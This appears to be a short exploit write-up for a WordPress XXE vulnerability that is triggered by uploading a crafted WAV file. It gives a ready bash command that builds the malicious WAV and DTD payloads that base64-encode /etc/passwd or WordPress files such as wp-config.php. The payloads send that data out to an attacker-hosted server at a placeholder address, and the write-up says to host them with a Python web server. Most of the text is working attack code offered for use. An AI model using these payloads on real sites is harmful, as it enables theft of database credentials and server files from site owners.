Arbitrary File Disclosure: the content of any file on the host’s file system could be retrieved, e.g. wp-config.php which contains sensitive data such as database credentials. Server-Side Request Forgery (SSRF): HTTP requests could be made on behalf of the WordPress installation. Depending on the environment, this can have a serious impact. Exploiting the vulnerability
A wordpress site affected by this vulnerability has been identified in the enumeration process with the help of the wpscan tool.
It's very easy, in your bash console
nano poc.wav
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
In your attacker pc create a dtd with the code execute in the web server.
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
Note: for read wordpress files use the syntax "../WP-FILE.php"
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../index.php">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
Host a python server to the files directory (python3 -m http.server 8081)
https://github.com/motikan2010/CVE-2021-29447 https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5